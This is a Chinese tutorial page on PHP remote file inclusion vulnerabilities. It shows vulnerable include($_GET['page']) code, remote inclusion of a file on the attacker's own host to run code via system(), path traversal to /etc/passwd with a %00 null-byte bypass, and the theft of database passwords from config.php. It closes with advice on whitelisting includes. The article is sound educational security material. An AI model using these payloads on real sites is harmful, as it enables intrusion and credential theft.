喜欢本站并加入收藏
首 页 电脑学园 技术文档 图形图像 办公应用 网页设计 管理资料 PPT模板 方案合同
 位置: 北方教程网 >> 网页设计 >> PHP专题 >> 正文
   分析PHP远程文件包含漏洞情况
分析PHP远程文件包含漏洞情况
[ 作者:佚名   来源:网络整理   点击数:   更新时间:2007-7-2 ]

首先要谈到的的问题是,什么才是”远程文件包含漏洞“?简要的回答是服务器通过php的任意文件包含过滤不严,从而去执行一个恶意文件,这是个程序员过滤上的问题,请记住,所有的cgi程序都有这样的bug。

1.找出bug:

为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的文件。在php里,我们使用include()函数,它的工作流程:
如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。
我们先看这个,当用户输入通过后就包含文件,也就是

以下是引用片段:
if ($_GET[page]) {
include $_GET[page];
} else {
include "home.php";
}
这种结构在动态网站里是常见的,问题是它允许这样
http://www.target.com/explame.php?page=main.php 或者http://www.target.com/explame.php?page=downloads.php来查看。无论如何,如果你的程序里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,文件包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程序员依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。

2.测试

这里有个远程文件包含的例子,目的只有一个,为了你的程序安全,我们来看具体的
http://www.target.com/explame.php?page=zizzy

以下是引用片段:
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
Warning: main(): Failed opening ’zizzy’ for inclusion (include_path=’.:/usr/local/lib/php’) in /var/www/htdocs/index.php on line 3

php输出的这些错误信息告诉我们,程序去包含文件/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的文件,现在理解了吧。

3.利用

php确实很好,可以远程调用文件,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样

以下是引用片段:
<?
echo "Wow,test!";
?>

那么http://www.target.com/explame.php?pa...e.com/yeah.txt
OK, 回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../../../.. /etc/passwd。知道什么叫真正的包含了吧。

4.另一种

有时程序员换种写法,写成这样,限制了包含范围

以下是引用片段:
if ($_GET[page]) {
include "$_GET[page].php";
} else {
include "home.php";
}
我们提交
http://www.target.com/explame.php?pa...e.com/yeah.txt

以下是引用片段:
Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
Warning: main(): Failed opening ’http://www.mysite.com/yeah.txt.php’ for inclusion (include_path=’.:/usr/local/lib/php’) in /var/www/htdocs/explame.php on line 3 
包含失败了,限制了后缀名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
那passwd怎么办

以下是引用片段:
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
Warning: main(): Failed opening ’../../../../../../../etc/passwd.php’ for inclusion (include_path=’.:/usr/local/lib/php’) in /var/www/htdocs/explame.php on line 3 

在这里使用个NUL字符,也就是%00来跳过检测
以下是引用片段:
http://www.target.com/explame.php?pa.../etc/passwd%00
看见了吧。

5.建议

包含文件时最好指定好包含哪一个文件,或者过滤好提交的的变量,这也就是这篇文章的目的,不是写给hacking的人看,而是写给那些初涉程序员的人,这样的文章网上很多,只要有人受益,也就达到目的了。

上一篇文章: 使用PHP创建RSS阅读器的方法和技巧 下一篇文章: 没有了
打印此文  收藏此页  关闭窗口  返回顶部
 相关文章  热点文章
 · 利用CSS改进网站设计的小技巧
 · Dreamweaver快捷操作技巧集锦
 · 使用Dreamweaver架设网站简明教程
 · 网页设计制作过程中常用的几个代码技巧
 · 高效使用CSS编码的方法
 
热点图文
教你节省Vist...
使用Windows ...
 · 远程管理Web服务器的方法技巧
 · Win Vista系统自带IIS7.0设置详解...
 · 详解Windows系统IIS6.0功能及应用...
 · 服务器集群系统实现方法及案例分...
 · IIS服务器实现asp,cgi和php+mysq...
 · IIS下SQL Server数据库安全设置技...
推 荐 阅 读
巧用Photosho...
Photoshop鼠绘...
 · Fireworks制作旋转的漂亮gif动画...
 · Photoshop制作都市满天繁星
 · Fireworks制作Menu按钮
 · 巧用Photoshop制作喜迎奥运壁纸
 · 巧用Photoshop钢笔工具绘制彩色美...
 · Photoshop制作浪漫动感花朵
 设为首页 - 加入收藏 - 关于本站 - 联系我们 - 广告合作 - 友情链接 - 在线交流 - 
CopyRight© 2006-2009 Eduai.Com All Rights Reserved
在线交流 QQ:524152258 辽ICP备07001851号
免责声明:本站部分资源来自网络,如有侵犯您的版权请通知,我们立即删除。